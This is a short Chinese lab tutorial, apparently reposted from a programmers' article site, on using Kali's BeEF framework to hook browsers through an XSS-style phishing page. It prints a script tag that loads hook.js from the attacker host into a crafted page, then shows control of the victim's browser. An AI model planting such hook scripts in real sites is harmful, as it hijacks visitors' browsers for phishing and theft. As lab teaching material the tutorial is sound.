Kali之Beef利用Xss进行钓鱼
程序员文章站
2022-05-16 10:58:56
...
1、操作准备
攻击机:Kali(ip地址:192.168.1.107)
受害者:Windows7 x64(ip地址:192.168.1.163)
2、配置Beef
进入beef的配置文件里
aaa@qq.com:~# vim /etc/beef-xss/config.yaml
在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改
注:(默认beef用户名和密码位User:beef,Password:beef)
3、启动Beef
aaa@qq.com:~# beef-xss
输入账号密码进行登录
4、配置apache2
1.进入apache2的目录下将自己制作好的网页替换掉默认的index.html
2.将<script src="http://192.168.1.107:3000/hook.js"></script>
挂到自己制作好的网页中
3.启动apache2
aaa@qq.com:~# /etc/init.d/apache2 start
5、进行钓鱼
1.Windows7访问该网页
2.在kali上可以看到,受害者已经上线了
3.进行攻击
案例(这里通过beef给受害者发送一段音乐)
在受害者的浏览器上可以看到音乐已经被播放
warning :未经授权,不得转载
本文所介绍技术仅供参考学习,切勿恶意用途
上一篇: 判断一棵树是否是完全二叉树
下一篇: [IOS]如何在app里面改变语言
推荐阅读